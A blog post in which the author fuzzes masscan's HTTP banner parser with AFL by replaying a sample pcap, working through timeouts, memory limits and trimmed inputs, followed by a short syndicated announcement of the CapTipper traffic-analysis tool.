This change was trivial, successfully running it is tough. You have to configure the command-line so all IP addresses match up with the libpcap file content, which is a pain. I created a sample lipcap file and checked it into the project, along with a help document explaining it. Just git clone the project, run make, then run this command line to see it run for yourself:

bin/masscan --nobacktrace --adapter file:data/afl-http.pcap --source-ip 10.20.30.200 --source-port 6000 --source-mac 00-11-22-33-44-55 --router-mac c0-c1-c0-a0-9b-9d --seed 0 --banners -p80 74.125.196.147 --nostatus

If you run on the command-line, it appears to return immediately. I say “appears” because there’s actually a 10 millisecond wait. That limits fuzzing speed to a 100 attempts per second, rather than thousands per second. That’s a tougher change, so I’ll have to get around to fixing that, but in the meanwhile, you can just run a bunch of AFLs in parallel to get around this.

But when I try to run AFL, it’s not working at the moment. In instead get this error:

As you can see, the command that returns in 10ms is now hanging when run under AFL, which says that it doesn’t return in 1000ms. Using the ‘-t’ option to increase the timeout doesn’t help. Running masscan in some other way, such as parsing configuration files, works just fine.


Update

So I changed to where I “join” threads cleanly, so that the entire thing can run cleanly without every having to stop and wait. However, this creates a second problem not AFL refused to run because it’s crashing instead of hanging. AFL suggests that it might be an out-of-memory issue, and that I should increase memory. So I bumped up memory and now it’s running.
This memory issue might be what the problem was all along. Masscan assumes big scanning and sets up some large data structures at the start, so it may exceed the 50-megabyte assumed by AFL.
So now I have it running, fuzzing HTTP server response input:

But this isn’t really success. The pcap file is 1986 bytes long. However, AFL has “trimmed” the input file down to 0.20%, which is the first 4 bytes of the file. This is just testing the libpcap library at this moment, and the fact that it supports multiple file types determined by the “magic” string in that first 4 bytes. I need to figure out how to make it fuzz starting deeper in the file, not at byte 0.


Update

I got the LLVM version working on Raspberry Pi 3 Odroid C2 ARM-64, so naturally I need to spread the work across 4 cores.

The Odroid has slightly faster CPUs than the Raspberry Pi 3, but mostly importantly, it’s got 64-bit Linux available to it, which the Raspberry Pi 3 apparently still doesn’t.

CapTipper – Explore Malicious HTTP Traffic

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/Y8HVB-RsGlQ/

CapTipper is a Python tool to explore malicious HTTP traffic, it can also help analyse and revive captured sessions from PCAP files. It sets up a web server that acts exactly as the server in the PCAP file and contains internal tools with a powerful interactive console for analysis and inspection of the hosts, objects […]

The post CapTipper…

Read the full post at darknet.org.uk